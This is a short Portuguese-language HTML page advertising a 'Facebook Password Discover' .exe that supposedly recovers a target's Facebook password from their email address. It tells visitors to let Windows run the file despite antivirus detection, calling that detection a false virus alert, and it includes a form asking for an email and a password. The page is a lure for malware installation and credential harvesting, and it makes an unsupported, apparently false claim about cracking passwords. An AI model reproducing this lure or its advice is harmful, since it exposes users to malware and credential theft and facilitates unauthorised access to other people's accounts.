<html>
<head>
	<title> facebook hacking tools </title>
</head>
<body>
	<table>
		<tr>
			<td>
				<img src="log.png" width=100 height=100>
			</td>
			<td>
				<font size=5>Facebook hacking tools
			</td>
		</tr>
	</table>
	<h1>Download</h1>
	<br>
	<a href="facebook_password_dicover.exe">Facebook Password Discover</a>
	<hr>
	<blockquote>
	Efetue o download da aplicação para o seu PC e execute a mesma. Terá de permitir a execução da aplicação no Windows, uma vez que esta será detetada como (falso) virus. Insira o email do alvo na página. Depois de executar a aplicação terá de esperar alguns minutos (por vezes horas) até que a password seja descoberta.
	</blockquote>
	<br><br>
	<table>
		<tr>
			<td>
				email
			</td>
			<td>
	 			<input type="text">
	 		</td>
	 	</tr>
	 	<tr>
	 		<td>
	 			palavra passe
	 		</td>
	 		<td>
	 			<input type="text">
	 		</td>
	 	</tr>
	</table>
</body>
</html>
